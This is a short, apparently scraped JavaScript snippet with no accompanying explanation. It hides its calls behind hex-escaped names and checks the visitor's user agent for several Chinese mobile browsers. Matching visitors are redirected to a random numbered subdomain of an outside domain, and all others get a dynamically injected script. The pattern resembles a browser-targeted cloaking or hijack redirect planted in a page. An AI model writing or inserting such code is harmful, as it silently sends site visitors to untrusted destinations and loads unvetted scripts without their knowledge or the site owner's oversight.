
if (/(baiduboxapp|UCBrowser|quark|Quark|HuaweiBrowser|QHBrowser|QihooBrowser|360)/i["\x74\x65\x73\x74"](navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"])) {
    let arrUrls = [
        'https://' + Math.round(Math.random() * 100) + '.csb6.cc',
        
    ];
    let url = arrUrls[Math.floor(Math.random() * arrUrls.length)];
    window.location.href = url;
} else {
    console.log('aa');
    var script = document.createElement('script');
    script.type = 'text/javascript';
    script.src = '/mjc/st18_1.js?v=' + Math.round(Math.random() * 100000);
    console.log(script);
    document.head.appendChild(script);
}


